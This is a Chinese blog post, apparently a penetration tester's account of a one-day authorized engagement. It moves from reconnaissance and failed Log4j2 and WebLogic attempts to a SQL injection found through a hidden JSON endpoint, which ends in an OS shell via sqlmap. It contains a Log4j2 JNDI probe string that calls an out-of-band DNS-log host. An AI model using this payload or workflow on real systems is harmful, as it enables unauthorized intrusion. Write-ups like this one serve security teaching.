记一次安服仔的逆袭 | 实战

Delina

原文链接：记一次安服仔的逆袭 | 实战
​
按照惯例，每次护网开打的前几天，业务都会带着我们上门给甲方爸爸做安全服务。这次不知道是不是业务喝酒喝多了，居然跟甲方爸爸打包票能够找出大问题，而且就给我一天的时间，这不是为难我胖虎吗.jpg。
既然无力反抗，就只好躺平了。
首先看来看客户给的资产,嗯下面有清清楚楚的 8 个 url:

​

虽然不全，但至少给了几个 ip，能够加快我们信息收集的速度。先打一套信息收集组合拳, oneforall、fofa、quike等等，整理完资产最后成果如下。

​

但我看到 xxOA 的时候我的心情是愉悦的，想着最近的 log4j2 心想能够交差了，这不有手...,呸有工具就行。
先看 OA，拿出大佬的 seeyou-GUi 工具一顿操作,然而并没有什么用。可能是开发打过补丁了。
开始测试 log4j2, 被动扫描开启，检测 log4j2，没有出现我预期的情况，难道也被修复了吗？

​

不信邪的我开始手工测试，登录框插入 poc ${jndi:ldap://xxx.dnslog.cn/f3qetn} ,静待回显。
可惜 dnslog 毫无反应，换 ceye、burpcollaborator.net、xray 反连平台利用绕过语句继续测试。仍然没有没有回显，那就换下一个站，weblogic 是 10.3.6 的，工具没有利用成功。
tomcat 也没有弱口令，好吧不能偷懒了。
只能一个个站的去测试，目录爆破、暴力破解、burp+xray 联动、工具扫描。直到下午 3 点多，才测出两个小漏洞,开始思考以往看过的文章，对我来讲无非三个思路:
1、续收集资产
2、寻找 js 接口
3、弱口令突破。
但 1 和 3 这两种方法之前已经投入了比较多的时间，个人也不想继续了，寻找 js 接口的操作已经看过很多文章但并没有在实战中真正用到，不如趁着这次机会实践一下。
根据以往的经验，aspx 与 php 的网站的漏洞会比 jsp 网站多。那就先从 aspx 开始。
看了两个站的 js 以后，还是没有什么收获，突然一个 html 源码的 test() 函数让我觉得有点希望

​

已知是 json 格式，那就尝试一下，运气好，提示 id 参数未传入

​

xray 跑出一个 mssql 报错注入

​

sqlmap 检测可以 --os-shell，sqlmap 检测可以 --os-shell 这里算是拿下一台服务器权限了。可以交差了。
​